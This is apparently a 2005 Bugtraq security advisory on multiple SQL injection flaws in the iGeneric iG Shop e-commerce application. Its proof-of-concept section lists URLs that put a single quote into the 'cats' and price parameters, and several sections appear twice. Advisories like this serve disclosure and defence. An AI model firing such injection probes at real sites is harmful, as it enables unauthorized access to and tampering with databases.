iGeneric iG Shop Multiple SQL Injection Vulnerabilities
BID:12627
Info
iGeneric iG Shop Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 12627 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2005 12:00AM |
| Updated: | Feb 22 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "John Cobb" <[email protected]>. |
| Vulnerable: |
iGeneric iG Shop 1.4 iGeneric iG Shop 1.2 iGeneric iG Shop 1.0 |
| Not Vulnerable: | |
Discussion
iGeneric iG Shop Multiple SQL Injection Vulnerabilities
iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
It is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed.
iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
It is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed.
Exploit / POC
iGeneric iG Shop Multiple SQL Injection Vulnerabilities
No exploit is required.
The following proof of concepts are available:
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search
No exploit is required.
The following proof of concepts are available:
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search
Solution / Fix
iGeneric iG Shop Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
iGeneric iG Shop Multiple SQL Injection Vulnerabilities
References:
References:
- iG Shop Product Page (iGeneric)
- [NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure & Possible SQL Inj ("John Cobb"